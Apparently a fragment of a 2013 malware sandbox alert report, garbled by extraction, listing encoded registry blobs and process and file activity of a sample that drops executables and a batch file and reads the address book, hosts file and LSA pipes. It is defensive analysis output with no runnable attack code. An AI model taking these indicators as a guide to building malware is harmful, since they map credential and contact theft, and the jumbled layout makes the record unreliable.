FekVoldiHpM4nTqOV10c1AaOSMJvgOQP5 LfmRSR9YbMtLpMrFFXVJlw9goiiaaKp/5UY YjPbCYVnq4AcbJfkqkZfrbfJQGsdZt/Ch4IgV bvkiuB5AoVD9A2OwlWbf1ATpa95BX+BFE5 JDE3SuxiqGpmjEZs4rk0TTrTu8QgYz347ed 2sbXMTEfvf7oTtRpF3FqnLNuUj5NCMp7W Wg7R+GY7fytFR4+kw3xwWXHLc/XS2FR98 PCh7ESrMZjQeUTHa6KUbR1PUyGP1zgX5 7tMVllA95WI6kfHedYdmi7LLsWEc94hX8xS uYkHQRZg+qRCstJTJS2CjyQzlT+UU0oTlJB Ov0C3Rn/X1M6KJAettZlu/tQRhWsyg1cgIv9 swrS3fy/UkenSSPfCNV8aGKMyH75ZnMeL PUc3DDR3B9vsVOiEd9LtQn8lBcKteLu+ICP qCA/ftL2byWyY/0E5WE+dZmE=
REGISTRY\USER\Malware\SOFTWARE\MICROSOFT\OVNEOCAQY
20dcj2dj
SZ
futxhK4DNUDRIlZxQfKkhf/ZXWdkOj9O5gZo 4Mf/VED1jOxz2GOCOd70lh7Ou9iDaqs+zpu 91H2N3Hg1wESyAoro2ZFKYkWsQdCRv3G soyA7xBGeXVAZ/vhYUo3O/oikqYdnmTcPN RE4WKn3hSeVhYoF7l1iFhKf0lpB2wHxIO4I W5Q5QbGy74ucwuG/WQwF8y+99aPOo8z RcOrB7cjAlRn9iTTdWuEQayfz469Q3O03t6 TySw9I7Qt2I/hj7+c1+wqycD7aP+dnadqZvEr A9gDfNcbKNxlfvswInMU/J/gxNBtZjGLoD60 GaxdPlN5GC3rq8eNfOJ4Njpcait125Zjw7hxt BkPTwy4H+pG3uQcEqaiCt92yEA==

BINARY
2j0v6FWp4XQ/BYvb1xOBmStwBeHZJIk6WJ 7zonH9nmZIA2m5RMmo/nIsaFXZZi6om/4+ zpq91G1Z3ng11OPFUH31N8mutHqlNPTCu swabHCrYCV6UvJjYWb97AorLDQfNZgx7Q pnqB1vPNR4sADjp2CFJM7Z0FF+Go2n4VH vnIEC5XWgvUZWOl3pjXUoLipnZmYyLJ4sE mXbY/3vm4LEeTEhKswhxWt+FSAzuJW26 D0rhUeGOApOcsWBMMId483sLGyo31rLBz YEDMWP7pvaWNeUrD4hP6zAvRls98CluN4 CdPuxpyFV01iFFdejXGkdUdPyMfoStdLIp8 WMT1cDJZNnk8heIjAKDVYLe+qf/PMaE6zX FkFUtFtKp4VKHGU31moaYOLxd81jF9w/Me FM6LhWhHgeiekXi6JVDmVW8Xy5HSgZgvz 9nS94MKDRn37DUrAr7FERZK5UAzFyPrRf ObQTJVpj5Wk90rKgxD/d2NYW9BJNBKH2g RnivRY+WcqzaVBIPkT/6hxLb3ejhRiTof05Fx uwcIGpWWvt8W9yUNBoqqnbgAW3DTycgt UGUygwGh4zrfllYZR0Viq0airiVz/ViNZg9uTg bjzzVbZspQa0WzjSuFx9gkv4E9TJYiLyi946 WY8+pQoatNVROKmpd9uSzdaFIOC77G2N 3wtMdkmc77VS2fjuOePTv99b39tjUwyjmGT oK3U6RYfhdWCtGEfctxZm/a87wOibOZrM7 dXpQNA5xHaglZL6yxF5x1UU6I+yoLtTOKW BMOjCGTgBtJaXhejlctcgO4fLzcpSYnns9MR OHxHDL+uIBIH713Kn3nCeDuBPQ1wLbMjP hE0o0QAyuWWVeYlrfwy+QaBwmiZ8SFu7D iurZL2YeVEQbLcP31yScLm8y1dcJ3K0I7MN z8A5VU6kjI7WH617QRHU0VKDn25mfeVq WzJ4dGZcYNCy0F+aRKi6gfpcI0Z/BPwftAb ubOR/alUioYHujp5yrgRorrXWIY/aUhvObO0 ATqmoqashnAW9gI6EIfnGaOQzVMZkyC7F 4aKUbB1PQ3eM1ziO77tMEPj9j71HDJ5rZ3 WKwO3ghBrD7VLQIyQXJu/njti6PBd3k/xmUf 8z7kubvIlK/TLm0yc5FbuSDFCrzCN3ittJUXX sZeLa/AEguGdSLDTvIHNQmcNRuFjG8eoV CBd1i6qsW6Gew4r5hQ0Vzz62V5jGv8JCtbJ tDrL4hMA1U+V7VPpaJVlcn5/JB3IZZtoBx8A sbSBJ9LYOv5k23l7zU7UjxFxNUjGwUTzSp FCDA6MYgAHi26CGCI++T4L8YQXvuHQK1 ux/R3MOh0PEwAul3DDyUeBrdKZ5v3nNAa SXdbuaA57PTJ+wEnQXx7arScl/xFNAT+Pn GhxsJl+M5mH+a85lmJ7c3TRq6/INkLdyvdH HEigmVP3S+4cqhKmaFJnEIRZR05YO7Dh0 KyZXUPELoM5lVGn9cbx4YVxwa5QlYl6C5L lxfQUUTtADXHl85BzrHQghFQSYPSU7KBE Ar5yMgPGCo6wwWwdHWFfQnLfj3Jx8Zbm K00x4SjhjwKtDvWPM7BRXSi4rKOm9+mR9 /KRclYqWHmScQ1ab5+cndRd1YfZtCZFcN3 W/GfSjLFnV1Eiv2t+mZmUonFxAwuPPBih54 TETTbhq6Y2jHa6CzCGpIQNKj1icUcp6DD5 cYydoSdxkR41VVEa52dY0MA2nroBvytJ5Vd 3l+drtUHeXnSzJOkC5GNhU1ufOLQC520pJ nCtrizOJj0WGt1JX4zGNgjSdt/nqrU+RpWXw uFUuK9XK2aOmfhNYtg3HzA4UrO0/LuS4br BEP8VrAdpGnc7JIE0FQkaTcmQKT+Y5udQ bNtoYTC0SG0urnSSVbhLZ7N/QZ9H9LOqC RB25VuBdgVfSD4s44G4q8G5pQwRrKwSH C29PfjPfmkJHmWngtAmtpmzoEYCs3xsLyy LfkmUXXaCiMbJcZE7O/ga9Gq54p5y3Hhm OuE1qqM7PSwfavwU07H2Q8JsTTyyLN1wz Tlvm5fVL/hMVITEnA95KPo2x04EchiICZkY WP977G8yzx3TyU1Rn8Jb7NHxXR4EugOz AnDZsnb/bfLumxQgx3WzqkUOgKfXZGrxR m6nXhmZ5Uq0LnNxvwhZevA9y+GhEbg3K Q1euKcvIHG+yyAwYdf98iHtBK2nRfsE0KMk S0rsB99Jcwj52+zSSVkh414qgjTyOHS90gi5 UZEebA7wMiPRaQt4c4HHoUWAfwpcTUhH zwduxOk4ExOZcfT2bbxdtDjkTkmvPhRLeU6 y+1zLYxNQ2xL5sLs23D50XxWsynptmTPRn FEDTYY24Cztz+k0LnUczRTYJZ2fMoLX+p5 B4f3+xY50eZKKqXvIjZCT8T3leHVAJLUX10l leR+YUnV/cJ+uYgWNSj2Xx+O6otEuzfVa9xi 5ag33e+zYxW/1aS8xH71JHVCaCeoUUWs YvqYQ14FoJO1sJQQUl7l3hAdQ5EWSzK9t FoYuUQRkYIsLvkWikpQqnBKxObbmnk7Ve e+P/QTmpWJDEVyF9sIGnTxHYnycq8LoOE CCVfyhnCwRXvJHxnUf/MvWeHpy1cH+H/M 6TmPwzOMoNEp2jmTKvQE5Vf7V0FOwHq pfJrKhsqA/gwNnUOCAMneGDwi0IXrEHnC3 bxPVoNqXkGJo30YgtJtRlCAa6ai9f/7CDXf9v Wxi5UkdnkyH+rbnus3YZh+tGMCqbmNUDM yIlxF7UvORqQELIQPtWirTl6rZqZpVTeLZlW ArUvlRyn9eZGOkiTGfJOqtomRX7o1TTBdFj +A7iobP/eY5a/Z/OXMvUX67N3P6q5PYnyo HODjCUujhW1TYpv4OvN0HP7YdwoOcqhh xZ1ThvDOAseoqGQF9pChkmFT1xu8dQaX gj8Ao/k+FLMBb4x4tznI4xdByZiK4GlfT6x0W Ei8oSoEB4FwWenEQ6dsa8GXfeASOmqLH kvVy3GD2GlfXFUc789fkO2PuJH3h3itmbb1d cW69an8NvMR0qAi8UODJNPu1ot9u04oUZl IdY2pDeG1B/FmXsldqIk7vR87AiVCblDYbsZ JTdfGdBgE8FBec29kFHNtwxwL8MrIuoZsQ BQYsap4E0PuCm2qNNkX67nixRcTTuLiB67 N3J8GE0L4HLMFNmj6lXLMxgAt5hJoNiyJs Kyy4huKmybFoR2/kQ4Nr3G2cusjSqp63tX8 7Q8NIWdp8kccvWi9za+KN1wqn+W2J3x2Y 15zoG7m3fJMk2iLkfS7IiQh4uzMrSfugo5Ige OpHV/j6+QSGh6nDzAAsZ149T22LnkpBnB PDguuwJv8i9xaoHx73QJELzUAwuZnAUON

CuT====

1000 (cmd.exe) 1000 (cmd.exe)
1000 (cmd.exe)
1000 (cmd.exe)
1000 (cmd.exe)
748 (svchost.exe) 748 (svchost.exe) 748 (svchost.exe) 748 (svchost.exe)
748 (svchost.exe) 748 (svchost.exe)
748 (svchost.exe) 748 (svchost.exe) 748 (svchost.exe)
748 (svchost.exe) 748 (svchost.exe)
748 (svchost.exe)
748 (svchost.exe) 748 (svchost.exe) 748 (svchost.exe) 748 (svchost.exe) 748 (svchost.exe) 748 (svchost.exe) 748 (svchost.exe) 748 (svchost.exe) 748 (svchost.exe)
OlkContactRefresh OlkFolderRefresh

Action
\DOCUME~1\Malware\LOCALS~1\Temp\VKO2BB.bat
1308 (xsiretgashup.exe)
Modified
\Documents and Settings\Malware\Application Data\Imdeaj\iqybox.exe
1308 (xsiretgashup.exe)
Modified
\Documents and Settings\Malware\NTUSER.DAT.LOG
1308 (xsiretgashup.exe)
Modified
\lsarpc
1308 (xsiretgashup.exe)
Modified
\DOCUME~1\Malware\LOCALS~1\Temp\xsiretgashup.exe
1188 (c13cf0af350fd6dfb8380 d0968c230b1.exe)
Modified
\ROUTER
1188 (c13cf0af350fd6dfb8380 d0968c230b1.exe)
Modified
1188 (c13cf0af350fd6dfb8380 d0968c230b1.exe)
Modified
\lsarpc
\net\NtControlPipe5
\Documents and Settings\Malware\NTUSER.DAT.LOG
1188 (c13cf0af350fd6dfb8380 d0968c230b1.exe)
Modified
788 (svchost.exe)
Modified
\Documents and Settings\Malware\NTUSER.DAT.LOG
1352 (Explorer.EXE)
Modified
1000 (cmd.exe)
Modified
\Documents and Settings\Malware\Application Data\Microsoft\Address Book\Joe Maldive.wab
\lsarpc
1000 (cmd.exe)
Modified
1000 (cmd.exe)
Modified
\ROUTER
748 (svchost.exe)
Modified
\WINDOWS\Prefetch\CMD.EXE-087B4001.pf
748 (svchost.exe)
Modified
Nov 4, 2013 16:03 EST Page 1658
Details for Alert ID 67540517
\lsass
\Documents and Settings\Malware\NTUSER.DAT.LOG
\lsarpc
\??\C:\Documents and Settings\Malware\Application Data\Imdeaj\iqybox.exe \??\C:\Documents and Settings\Joe Maldive\Application Data\Imdeaj \??\C:\Documents and Settings\Joe Maldive\Local Settings\Application Data\diyq.xij
\??\C:\DOCUME~1\Malware\LOCALS~1\Temp\xsiretgashup.exe
\??\C:\Documents and Settings\Malware\Application Data\Microsoft\Address Book\Joe Maldive.wab
\WINDOWS\system32\rsaenh.dll
\AUTOEXEC.BAT \DOCUME~1\Malware\LOCALS~1\Temp\xsiretgashup.exe \lsarpc
\AUTOEXEC.BAT
\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk\rasphone.pbk
\ROUTER
\lsarpc
\WINDOWS\system32\rsaenh.dll
\WINDOWS\system32\drivers\etc\hosts
\net\NtControlPipe5
\WINDOWS\system32\rsaenh.dll
\DOCUME~1\Malware\LOCALS~1\Temp\VKO2BB.bat
\Documents and Settings\Malware\Application Data\Microsoft\Address Book\Joe Maldive.wab
\WINDOWS\Registration\R00000000000b.clb \lsarpc \WINDOWS\Prefetch\CMD.EXE-087B4001.pf \ROUTER
\lsass
\Documents and Settings\Malware\Application Data\Imdeaj\iqybox.exe \lsarpc
492 (lsass.exe) Modified 900 (iqybox.exe) Modified 900 (iqybox.exe) Modified 1308 (xsiretgashup.exe) Created 1308 (xsiretgashup.exe) Created 1308 (xsiretgashup.exe) Created
1188
(c13cf0af350fd6dfb8380 Created d0968c230b1.exe)
1000 (cmd.exe) Created
1308 (xsiretgashup.exe) Read 1308 (xsiretgashup.exe) Read 1308 (xsiretgashup.exe) Read 1308 (xsiretgashup.exe) Read
1188
(c13cf0af350fd6dfb8380 Read d0968c230b1.exe)
1188
(c13cf0af350fd6dfb8380 Read d0968c230b1.exe)
1188
(c13cf0af350fd6dfb8380 Read d0968c230b1.exe)
1188
(c13cf0af350fd6dfb8380 Read d0968c230b1.exe)
788 (svchost.exe) Read 788 (svchost.exe) Read 788 (svchost.exe) Read 1352 (Explorer.EXE) Read 1000 (cmd.exe) Read 1000 (cmd.exe) Read 1000 (cmd.exe) Read 1000 (cmd.exe) Read 1000 (cmd.exe) Read 748 (svchost.exe) Read 492 (lsass.exe) Read 900 (iqybox.exe) Read 900 (iqybox.exe)